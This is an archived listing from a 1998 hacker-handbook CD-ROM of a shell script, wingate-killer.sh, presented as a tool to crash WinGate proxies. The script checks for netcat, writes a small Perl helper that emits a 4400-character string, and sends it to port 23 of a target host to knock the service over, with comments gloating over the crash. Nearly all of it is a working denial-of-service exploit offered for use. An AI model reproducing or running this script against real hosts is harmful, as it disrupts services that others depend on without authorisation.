home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Handbook - Millenium Edition
/
Hackers Handbook.iso
/
files
/
c_scripts
/
wingate-killer.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
1998-12-05
|
1KB
|
45 lines
#!/bin/sh
# Looks like wingates have a problem when they get a long string..
# Havent been able to look any further into it.. it works.. they crash
# rejoice. - Kefka
# ------------------------------------------------------
# Wingates.. nobody likes them, kill them.
# Greetz: wtmp, albeniz, masa, jutt, malic, canask, dog.. everyone else
# ------------------------------------------------------
#
if [ "$1" = "" ]; then
echo ""
echo "rEWTED - wtf you trying to do!?"
echo ""
echo "joo forgot the hostname!"
echo "usage: $0 <hostname>"
else
if [ "`whereis nc|awk -F: '{ print $2 }'`" = "" ]; then
echo ""
echo "rEWTED - green people ahhh!"
echo ""
echo "Netcat not found, please download and install it"
echo "If Netcat is installed put it somewhere in your PATH variable"
echo ""
exit
else
echo ""
echo " ____________________________"
echo "[ kefka@infected.org ]"
echo "[ rEWTED - w3 d0n't like y3w ]"
echo "[____________________________]"
echo ""
rm -f killit
cat > killit << _EOF_
#!`which perl`
print "X" x 4400;
print "\n" x 1;
_EOF_
chmod 775 killit
./killit | nc $1 23
rm -f killit
fi
fi